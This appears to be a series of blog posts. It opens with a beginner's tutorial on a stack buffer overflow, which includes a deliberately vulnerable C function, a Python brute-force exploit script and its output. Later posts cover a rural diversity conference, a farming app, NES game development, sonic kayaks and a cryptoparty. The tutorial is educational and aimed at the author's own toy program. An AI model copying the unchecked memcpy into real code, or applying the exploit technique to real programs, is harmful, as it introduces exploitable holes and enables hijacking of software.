My first buffer overflow exploit

I know worryingly little about the world of computer security – I’ve probably written a huge amount of exploitable code in my time, so it’s a good idea as a programmer to spend a bit of effort finding out more about how our programs can be compromised in order to gain awareness of the issues.

The key to understanding exploits is the concept of the universal machine – the fact that trying to restrict what a computer can do is literally fighting against the laws of physics. Lots of money can be poured into software which sometimes only takes a couple of days to get compromised, its a Sisyphean task where the goal can only be to make it “hard enough” – as its likely that anything complex enough to be useful is vulnerable in some way.

Having said that, the classic exploit is quite avoidable but regrettably common – the buffer overflow, a specific kind of common bug which makes it possible to write over a program’s stack to take control of it’s behaviour externally. This was about as much as I knew, but I didn’t really understand the practicalities so I thought I’d write an example to play with. There are quite a lot of examples online, but a lot of them are a little confusing so I’d thought I try a simpler approach.

Here is a function called “unlock_door”, we’ll compile this into a C program and try to force it to execute even though it’s not called from the program:

void unlock_door() { 
  printf("DOOR UNLOCKED\n"); 

Now we need a vulnerability, this could be something completely unrelated to “unlock_door” but called in the same program – or it’s library code:

void vulnerable(char *incoming_data, unsigned int len) {
    char fixed_buffer[10];
    // woop! put some variable length data in 
    // a fixed size container with no checking
    // print out the return pointer, helpful for debugging the hack!
    printf("return pointer is: %p\n", 

The dodgy memcpy call copies incoming_data into fixed_buffer on the stack which is 10 bytes big. If incoming_data is bigger then it will copy outside of the reserved memory and overwrite other data on the stack. One of the other things stored on the stack is the return address value – which tells the program where the function was called from so it can go back when it’s finished. If we can set incoming_data from outside the program, then we can exploit it to redirect program flow and jump into unlock_door instead of returning properly.

We’ll make getting data into the program very simple indeed, and input it via a base16 encoded argument string converted to binary data passed to our vulnerable function in main:

unsigned int base16_decode(const char *hex, char **data) {
  unsigned int str_size = strlen(hex);
  *data = malloc(str_size/2); 
  for (unsigned int i=0; i<str_size; i+=2) {
    if (sscanf(&(hex[i]), "%2hhx", &((*data)[i/2])) != 1) {
      return 0;
  return str_size/2;

void main(int argc, char **argv) {
  char *data;
  unsigned int size = base16_decode(argv[1],&data);
  printf("normal exit, door is locked\n");

This is our vulnerable C program finished. If we run it with just a few bytes of data it operates normally and prints out the current return pointer, sending it back into the main function it was called from:

$ ./dodgy_door_prog 0000000000
return pointer is: 0x40088c
normal exit, door is locked

We can now inspect it in order to figure out the exploit. The first thing we can do is run the standard bintools “nm” command on the binary which prints out the addresses of all the functions in the executable. We can search this with grep to print the address of the target function we want to call:

$ nm dodgy_door_prog | grep unlock_door
00000000004007fa T unlock_door

The smart thing to do next is to work out where the return pointer would be relative to the fixed_buffer variable and offset this address to provide a payload to send the the program – I’m not smart though, so I wrote a python program to figure it out for me:

import os
import string

# this is stored in memory in reverse (little endian format)
unlock_door_addr = "fa0740"

def build_payload(length):
    return "00"*length+unlock_door_addr

ret = 0
count = 0
# try increasing offsets and until we get the exit code from unlock_door
# ignore all segfaults and bus errors etc and keep retrying
while ret in [0,35584,34560,34304,33792]:
    cmd="./dodgy_door_prog "+payload
    ret = os.system(cmd);
    print cmd

It took me a while to figure out that addresses are stored in memory backwards to what you’d expect as it’s little-endian memory layout (on intel and everything else these days). The script keeps adding zeros in order to offset the target address until it sits in the right bit of stack memory (you can see the return pointer gradually getting corrupted) and eventually triggers the function:

./dodgy_door_prog 00000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Segmentation fault (core dumped)
./dodgy_door_prog 0000000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Bus error (core dumped)
./dodgy_door_prog 000000000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Bus error (core dumped)
./dodgy_door_prog 00000000000000000000000000000000000000000000fa0740
return pointer is: 0x400840
Segmentation fault (core dumped)
./dodgy_door_prog 0000000000000000000000000000000000000000000000fa0740
return pointer is: 0x404007
Segmentation fault (core dumped)
./dodgy_door_prog 000000000000000000000000000000000000000000000000fa0740
return pointer is: 0x4007fa

The successful offset is 24 bytes. Now the good news is that this is only possible on GCC if we compile with “-fno-stack-protector”, as by default for the last year or so it checks functions that allocate arrays on the stack by using a random “canary” value pushed to the stack, if the canary gets altered it stops the program before the function returns. However not all functions are checked this way as it’s slow, so it’s quite easy to circumvent for example if changed from an array to to the address of a local variable instead.

More advanced versions of this exploit also insert executable code into the stack to do things like start a shell process so you can run any commands as the program. There is also an interesting technique called “Return Oriented Programming” where you can analyse an executable to find snippets of code that end in returns (called “gadgets”) and string them together to run your own arbitrary programs. This reminds me of the recent work we’ve been doing on biological viruses, as it’s analogous to how they latch onto sections of bacterial DNA to run their own code.

Report: Rethinking Diversity in a Rural Region Conference

FoAM Kernow is an organisation in one of the most disadvantaged parts of the UK. Many of the gaps in our society are particually obvious in Cornwall, the separation between those whom our social structures benefit and those who they do not are clear to see in the separation between the coastal and inland regions, and in many finer grained distinctions.

In our work we have gaps too – on the one hand there are projects like Future Thinging For Social Living and codeclub where we get out and go to people who can benefit most from our work, and on the other we have our workshops at Jubilee Warehouse where we do well in terms of gender and ethnicity, but not so when it comes to socioeconomic diversity. What makes this more important is that we are situated in a town that is in the bottom 10% of income levels nationally. One of the central questions for the next year is how we can combine our global collaborations and research projects and make use of them in the very local situation?

We had a chat with our friends at FEAST and Cultivator in Redruth at the end of last year who told us about a timely event: Rethinking Diversity in a Rural Region, a conference organised by the Cornwall Museums Partnership at Wheal Martyn in St Austell. Here are my notes from the day.

"[Many] people have no understanding of what you offer"

The event was kicked off by Rachel Bell, who has been working with museums across Cornwall as part of her creative intern role over the last year. She shared her observations of museums here (which was useful as I am new to this sector), such as the mix of global focus of Cornish museums as well as its local heretige, but an obvious lack of teenagers and people from different cultures visiting them.

Next to speak was Andrea Gilbert, who works for Inclusion Cornwall. Andrea listed the official Protected Characteristics of concern when we are talking about inclusion and diversity. Something I liked was that her organisation has a very open approach when talking to people about these matters, it's ok to get it wrong – to use the wrong descriptions for categories or the wrong words – the important thing is to muddle through and learn.

One focus for Inclusion Cornwall is working with people on health related benefits, there are 23,000 people here in this category making it an important group to target. Some others she mentioned included the 60 rough sleepers in Cornwall and the high number of migrant agricultural workers. There are currently 500 vacancies for these jobs – so it's not a case of "taking our jobs", and it results in 59 languages being spoken in the schools here! There were also 10 convictions involving modern slavery here recently, so many seriously disadvanted people are hidden from view.

When talking about inclusion and cultural organisations Andrea says that it's very much a simple matter that "people have no understanding of what you offer". It seems that there is much opportunity to change this.

"Diversity is about renewing your sense of belonging to your communty"

A provocative talk by Tehmina Goskar went a little more into the motivations and philosophy for increasing diversity. We need to start by understanding our own personal biases, as well as asking "who will miss you if you are gone?". One big motivation is that "diversity is about renewing your sense of belonging to your communty".

The places where we talk about this matter too, avoiding corporate meeting rooms and being in different environments is important – and the Wheal Martyn museum (although having acoustic issues) was a great example of this kind of consideration. We saw lots of government statistics and phrases that are important in order to understand the official interpretation of the problems. Cornwall has 1m tourists per year resulting in a £2bn economy, and 68% of small businesses (SMEs) are in rural regions, so it seems that the cities are largely the preserve of the big companies. 20% of people living here have never been online. There is a concept used by DEFRA of Rural Proofing where the needs of rural people are considered in policy. Problems such as mobile coverage, lacking access to skills, R&D and transport are considered relevant.

There are more elderly people in rural areas too, and small pockets of deprivation which are harder to identify and easily overlooked by institutions. Tehmina suggested that we take matters into our own hands and get out and map them ourselves, and get to know our community better.

In practical terms diversity leads to more talent in your organisation, and longer term security – while a narrow focus tends to actually be more expensive, and shorter term. Ultimately, diversity is a creative force in it's own right, not to be ignored.

"Diversity is a creative force"

We had some quick examples of case studies next, Jan Horrell told us about the Wheal Martyn Memory cafe, which provides help and social contact for people with memory loss and importantly also some time out for their carers. Over time their participants went from being simply provided for, to more active joining in and eventually running their own activities for the others in the group. They also worked with Story Republic to provide theatre and story telling activites.

Zoe Burkett from Penlee House gallery and museum wanted to attract younger volenteers to help out with the 150 or so existing ones. They worked with Carefree who provide a different service to the normal 'working with schools' approach commonly used by organisations. Instead of deciding on an activity to do with them, they asked them what they would like to do – and they decided on an artistic skillsharing event across the generations to provide something for all the volunteers working there.

Liz Shepherd from Royal Cornwall Museum has been working with migrant families whose transient lives mean their children tend to be working at lower academic levels for their age. She decided to focus on music, which has otherwise been pushed to the edges of the curriculum in the UK. Music provides a cross cultural link for Polish, Lithuanian and Romany and Gypsy traveller families. She worked with the Cornwall Music Education Hub to help both children and the wider families to mix.

"the need for inclusive practice in physical and intellectual access are greater than ever before"

The final talk was by Becki Morris from the Disability Cooperative Network who attended the Rio paralympics inclusion summit and said that "the need for inclusive practice in physical and intellectual access greater than ever before". Her talk contained a lot of practical advice too, and introduced the concept of Universal Design as a way to think about these issues, so building things to cater for diversity makes them better for everybody – rather than to specialise things for different people.

Her slides were black text on yellow, and using matt rather than gloss for signs were a couple of simple design choices she talked about which can make a big difference. Also if you are running a museum, or using a space for any public event you should be publishing an access statement to make clear what the facilities are.

It was also interesting to see open source mentioned in this context, as being important for accessability generally. Groups she mentioned included purple space, a network of disability employee networks and AXSChat, an "open online community of individuals dedicated to creating an inclusive world". Becki also mentioned the issues we are facing politically, and that the times are bad – but they do also represent an new opportunity to break down some very old barriers.

In the afternoon I took part in a couple of workshops, the first ran by Emma Saffy Wilson and Becky Palmer was "how to reach new audiences". Some of the good ideas that came up included using our own families – as they often represent in themselves a lot of diversity, we should use this. With disadvantaged groups, the main issue is really confidence, so long term relationships are needed to be fostered. One way is to talk to other organisations with a history of working with groups you want to reach – but these contacts need to be treated very gently in themselves. At the end of the day, genuine listening and long term thinking are needed.

The second workshop I took part in, run by Theo Blackmore was "What should museums be doing to be more inclusive?". Although I was a bit less able to contribute to this, there were a lot of interesting suggestions – just getting people used to spaces, simple things first like using toilets in museums to simply get inside, and understanding that it's their space as much as anyone elses – that they are allowed to "hang out" there, is very important. Doing pop ups in galleries and museums is good too, to get different people involved and opening late or at weekends for people who prefer more quiet times rather than when it's busy.

Another idea from this workshop that seemed to resonate well was the "mantle of the expert", this concept from drama and theatre sets up a situation where (usually) young people are assigned the role of expertise over a specific subject or object which they learn and research themselves and then report back. This flips the power relation in a teaching situation.

So, plenty of things to think about. One of the biggest things was simply to find out about the organisations we should be talking to in relation to upcoming projects we are working on. Also when we are talking to researchers and artists looking for new ideas for who they should be reaching with their work this gives us a big picture of the situation in the rural region.

Farm Crap App Pro Edition

This autumn we have been developing a new version of the Farm Crap App with the Duchy College and Rothamstead Research. This project is about tackling the difficulties farmers have using natural fertilisers while needing to report realistic figures the government agencies – and understanding the guidance they provide. The original version was a big success, but only contained information on a handful of manures and didn't deal with the nutrient content of the soil.

In the "Pro edition" we are adding a lot more detail – the nutrients already in the soil can be estimated based on the type of the soil and the previous crops grown there. The needs of specific crops can also be added – we are concentrating on grass, barley and wheat for the moment – as this is a huge area to deal with. Once you have this information you can subtract it from the nutrients added by the manure to come up with a picture of which manure is best suited to a large range of crop, soil, rainfall and seasonal situations.


We are used to dealing with scientific data straight from research, but this data has been processed into a set of tables aimed at farmers and consultants by the agencies and civil servants based on the original research, which is very different. A lot of times you get the feeling that there is an underlying model being used which would be good to have access to. Meanwhile, we are taking these tables and converting them into a usable, minimal set of options that can be accessed and played with in the field – where the decisions happen.

We are also adding a new mapping feature, which was very much the most requested feature from the farmers and producers we tested it with. This allows you to draw on the map to record each field, which means we can get the size estimation from the GPS coordinates fairly accurately as well.

NES/Famicom game programming discoveries

Working on a NES game you are treading in the footsteps of programmers from the 80's, and going back to modern development feels strangely bloated and inefficient in comparison. This is a log of some of the things I've encountered writing game code for the What Remains project.

Firstly, although it seemed like a lunatic idea at the start, I'm very happy we decided to build a compiler first so I could use a high level language (Lisp) and compile it to 6502 assembler that the NES/Famicom needs to run. This has made it so much faster to get stuff done, and for example to be able to optimise the compiler for what is needed as we go along, without having to change any game code. I'm thinking about how to bring this idea to less projects on less esoteric hardware.

These are the odds and ends that I've built into the game, and some of the reasons for decisions we've made.



As well as sprite drawing hardware, later games machines (such as the Amiga) had circuitry to automatically calculate collisions between sprites and also background tiles. There is a feature on the NES that does this for only the first sprite – but it turns out this is more for other esoteric needs, for normal collisions you need to do your own checks. For background collisions to prevent walking through walls, we have a list of bounding boxes (originally obtained by drawing regions over screenshots in gimp) for each of the two map screens we're building for the demo. We're checking a series of 'hotspots' on the character against these bounding boxes depending on which way you are moving in, shown in yellow below.


You can also check for collisions between two sprites – all the sprites we're using are 2×2 'metasprites' as shown above as these are really the right size for players and characters, as used in most games. These collisions at the moment just trigger animations or a 'talk mode' with one of the characters.

Entity system

With the addition of scrolling and also thinking about how to do game mechanics, it became apparent that we needed a system for dealing with characters, including the player – normally this is called an entity system. The first problem is that with multiple screens and scrolling, the character position in the world is different to that of the screen position which you need to give to the sprites. The NES screens are 256 pixels wide, and we are using two screens side by side, so the 'world position' of a character in the x axis can be from 0 to 512. The NES is an 8 bit console, and this range requires a 16 bit value to store. We also need to be able to turn off sprites when they are not visible due to scrolling, otherwise they pop back on the other side of the screen. The way we do this is to store a list of characters, or entities, each of which contain five bytes:

  1. Sprite ID (the first of the 4 sprites representing this entity)
  2. X world position (low byte)
  3. X world position (high byte) – ends up 0 or 1, equivalent to which screen the entity is on
  4. Y world position (only one byte needed as we are not scrolling vertically)
  5. Entity state (this is game dependant and can be used for 8 values such as "have I spoken to the player yet" or "am I holding a key")

We are already buffering the sprite data in "shadow memory" which we upload to the PPU at the start of every frame, the entity list provides a second level of indirection. Each time the game updates, it loops through every entity converting the world position to screen position by checking the current scroll value. It can also see if the sprite is too far away and needs clipping – the simplest way to do that seems to be simply setting the Y position off the bottom of the screen. In future we can use the state byte to store animation frames or game data – or quite easily add more of these as needed.



Obviously I was itching to write a custom sound driver to do all sorts of crazy stuff, but time is very limited and it's better to have something which is compatible with existing tracker software. So we gave in and used an 'off the shelf' open source sound driver. First I tried ggsound but this was a bit too demanding on memory and I couldn't get it playing back music without glitching. The second one I tried was famitone which worked quite quickly, the only problem I had was with the python export program! It only requires 3 bytes of zero page memory, which is quite simple to get the Lisp compiler to reserve – and a bit of RAM which you can easily configure.

New display primitives

I wrote before about how you need to use a display list to jam all the graphics data transfer into the first part of each frame, the precious time while the PPU is inactive and can be updated. As the project went on there were a couple more primitive drawing calls I needed to add to our graphics driver.

To display our RPG game world tiles, the easiest way is putting big lists describing an entire screen worth of tiles into PRG-ROM. These take up quite a bit of space, but we can use the display list to transfer them chunk by chunk to the PPU without needing any RAM, just the ROM address in the display list. I'm expecting this will be useful for the PETSCII section too.

I also realised that any PPU transfer ideally needs to be scheduled by the display list to avoid conflicts, so I also added a palette switch primitive too. We are switching palettes quite a lot, between each game mode (we currently have 3, intro, RPG and the PETSCII demo) but we're also using an entirely black palette to hide the screen refresh between these modes. So the last thing we do in the game mode switch process (which takes several frames) is set the correct palette to make everything appear at once.

Memory mapping

By default you get 8K of data to store your graphics – this means 256 sprites and 256 tiles only. In practice this is not enough to do much more than very simple games, and we needed more than this even for our demo. The fact that games are shipped as hardware cartridges meant that this could be expanded fairly simply – so most games use a memory mapper to switch between banks of graphics data – and also code can be switched too.

There are hundreds of variants of this technique employing different hardware, but based on Aymeric's cartridge reverse engineering we settled on MMC1 – one of the most common mappers.

In use this turns out to be quite simple – you can still only use 256 tiles/sprites at a time, but you can switch between lots of different sets, something else that happens between game modes. With MMC1 you just write repeatedly to an address outside of the normal range to talk to the mapper via serial communication – different address ranges control different things. 


Sonic Kayaks: musical instruments for marine exploration

Here is a bit of a writeup of the gubbins going into the sonic kayaks project. We only have a few weeks to go until the kayaks’ maiden voyages at the British Science Festival, so we are ramping things up, with a week of intense testing and production last week with Kirsty Kemp, Kaffe Matthews and Chris Yesson joining us at FoAM Kernow. You can read Amber’s report on the week here.



The heart of the system is the Raspberry Pi 2. This is connected to a USB GPS dongle, and running the sonic bike software we have used in many cities over the last couple of years. We have some crucial additions such as two water temperature sensors and a hydrophone. We have also switched all audio processing over to pure data, so we can do a lot more sound wise – such as sonify sensor data directly.

How to do this well has been a tricky part to get right. There is a trade off between constant irritating sound (in a wild environment this is more of a problem than a city, as we found out in the first workshop) and ‘overcooking’ the sound so it’s too complex to be able to tell what the sensors are actually reporting.


This is the current pd patch – I settled on cutting out the sound when there is no change in temperature, so you only hear anything when you are paddling through a temperature gradient. The pitch represents the current temperature, but it’s normalised to the running minimum and maximum the kayak has observed. This makes it much more sensitive, but it takes a few minutes to self calibrate at the start. Currently it ranges from 70 to 970 Hz, with a little frequency modulation at 90 Hz to make the lower end more audible.

Here it is on the water with our brand new multi-kayak compatible mounting system and 3D printed horn built in blender. The horrible sound right at the start is my rubbish phone.

In addition to this, we have the hydrophone, which is really the star of the show. Even with a preamp we’re having to boost it in pure data by 12 times to hear things, but what we do hear is both mysterious and revealing. It seems that boat sounds are really loud – you can hear engines for quite a long way, useful in expanding your kayak senses if they are behind you. We also heard snapping sounds from underwater creatures and further up the Penryn river you can hear chains clinking and there seems to be a general background sound that changes as you move around.

We still want to add a layer of additional sounds to this experience for the Swansea festival for people to search for out on the water. We are planning different areas so you can choose to paddle into or away from “sonic areas” comprising multiple GPS zones. We spent the last day with Kaffe testing some quick ideas out:

Looking at sea temperature and sensing the hidden underwater world, climate change is the big subject we keep coming back to, so we are looking for ways to approach this topic with our strange new instrument.

Crab camouflage citizen science game

The Natural History Museum London commissioned us to build a crab catching camouflage game with the Sensory Ecology Group at the University of Exeter (who we’ve worked with previously on the Nightjar games and Egglab). This citizen science game is running on a touchscreen as part of the Colour and Vision exhibition which is running through the summer. Read more about it here.





Foam Kernow crypto ‘tea party’

Last night we ran an experimental cryptoparty at Foam Kernow. We’d not tried something like this before, or have any particular expertise with cryptography – so this was run as a research gathering for interested people to find out more about it.

One of the misconceptions about cryptography I wanted to start with is that it’s just about hiding things. We looked at Applied Cryptography by Bruce Schneier where he starts with explaining the 3 things that cryptography provide beyond confidentiality:

Authentication. It should be possible for the receiver of a message to ascertain it’s origin; an intruder should not be able to masquerade as someone else.
Integrity. It should be possible for the receiver of a message to verify that it has not been modified in transit; an intruder should not be able to substitute a false message for a legitimate one.
Nonrepudiation. A sender should not be able to falsely deny later that they sent the message.

It’s interesting how confidentiality is tied up with these concepts – you can’t compromise one without damaging the others. Also how these are a requirement for human communication, but we’ve become so used to living without them.

One of the most interesting things was to hear the motivations for people to come along and find out more about this subject. There were general feeling of loss of control over online identity and data. Some of the more specific aspects:

  • Ambient data collection, our identity increasingly becoming a commodity – being modeled for purposes we do not have control over.
  • Centralisation of communication being a problem – e.g. gmail.
  • Never knowing when your privacy might become important eg. you find yourself in an abusive relationship, suddenly it matters.
  • Knowing that privacy is something we should be thinking about but not wanting to. Similar to knowing we shouldn’t be using the car but doing it anyway.
  • Awareness that our actions don’t just affect us, but our families, friends and colleagues privacy – needing to think about them too.
  • Worrying when googling about health, financial or legal subjects.
  • Being aware that email is monitored in the workplace.

We talked about the encryption we already use – gpg for email with thunderbird and Tor for browsing anonymously. One of the tricky areas we talked about was setting this kind of thing up for mobile – do you need specific apps, an entire OS or specific hardware? This is something we need to spend a bit more time looking into.

Personally speaking, on my phone I use a free firewall so I can at least control which apps on my phone can be online – and I only became aware of this from developing for android and seeing the amount of ‘calling home’ that completely arbitrary applications do regularly.

We also discussed asymmetric key pair crytography – how the mathematics meshes so neatly with social conventions, so you can sign a message to prove you wrote it, or sign someone else’s public key to build up a ‘web of trust’.

We didn’t get very practical, this was more about discussing the issues and feelings on the topic. That might be something to think about for future cryptoparties.